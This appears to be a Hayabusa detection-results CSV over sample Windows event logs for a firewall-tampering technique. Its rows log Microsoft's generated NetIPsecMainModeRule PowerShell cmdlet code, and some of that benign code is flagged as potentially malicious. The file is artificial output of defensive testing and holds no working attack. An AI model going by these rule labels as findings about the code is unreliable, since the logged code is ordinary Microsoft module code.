$true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecMainModeRule' -Alias '*' function Get-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletizatio",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.864 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase1AuthSet')) { [object]$__cmdletization_value = ${Phase1AuthSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecMainModeRule' -Alias '*' function Get-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletizatio",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.864 +00:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"n_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecMainModeRule' -Alias '*' function Set-NetIPsecMainModeRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, 